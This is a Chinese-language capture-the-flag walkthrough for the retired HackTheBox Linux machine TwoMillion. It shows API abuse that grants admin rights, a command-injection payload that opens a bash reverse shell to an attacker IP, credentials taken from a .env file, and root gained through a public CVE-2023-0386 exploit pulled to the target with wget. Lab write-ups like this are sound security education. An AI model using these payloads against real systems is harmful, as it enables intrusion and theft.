HackTheBox TwoMillion 机器破解报告 — API滥用、命令注入与CVE-2023-0386
HackTheBox TwoMillion 机器 Writeup — API滥用、命令注入与CVE-2023-0386
| 字段 | 详情 |
|---|---|
| 名称 | TwoMillion |
| 难度 | Easy |
| 操作系统 | Linux |
| IP | 10.10.11.221 |
| CVE | CVE-2023-0386 |
TwoMillion 是一台 Easy 难度的 Linux 机器,主题围绕旧的 HackTheBox 平台。它涉及解码邀请码、滥用 API 端点、OS 命令注入、凭据发现以及通过 CVE-2023-0386 (OverlayFS) 进行 Linux 内核权限提升。
nmap -sV -sC -v 10.10.11.221
开放端口:
2million.htb添加到 /etc/hosts:
echo "10.10.11.221 2million.htb" >> /etc/hosts
curl -X POST http://2million.htb/api/v1/invite/how/to/generate
响应是 ROT13 编码的。解码它:
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'
生成邀请码:
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d
使用解码后的邀请码在 http://2million.htb/register 注册。
通过浏览器登录,从 cookie 中获取 PHPSESSID(F12 → Application → Cookies)。
提升为管理员:
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"email":"[email protected]","is_admin":1}'
验证:
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}
启动监听器:
nc -lvnp 4444
发送反弹 Shell 负载:
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'
作为 www-data 收到 Shell。
在 .env 中找到凭据:
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123
SSH 登录:
ssh [email protected]
cat ~/user.txt
检查提示:
cat /var/mail/admin
uname -r
# 5.15.70 — vulnerable to CVE-2023-0386
在 Kali 上下载并编译利用:
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all
传输到目标:
# Kali
python3 -m http.server 8000
# 目标
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all
在目标上运行两个终端:
终端 1:
./fuse ./ovlcap/lower ./gc
终端 2:
./exp
获取 root flag:
cat /root/root.txt
本 Writeup 仅用于教育目的,针对已退役的 HackTheBox 机器。
| 步骤 |
|---|
| 技术 |
|---|
| 侦察 | Nmap 扫描 |
| 邀请码 | ROT13 + Base64 解码 |
| Web 权限提升 | API 操纵 → 管理员 |
| 初始 Shell | OS 命令注入 |
| 横向移动 | .env 凭据 → SSH |
| Root | CVE-2023-0386 OverlayFS 利用 |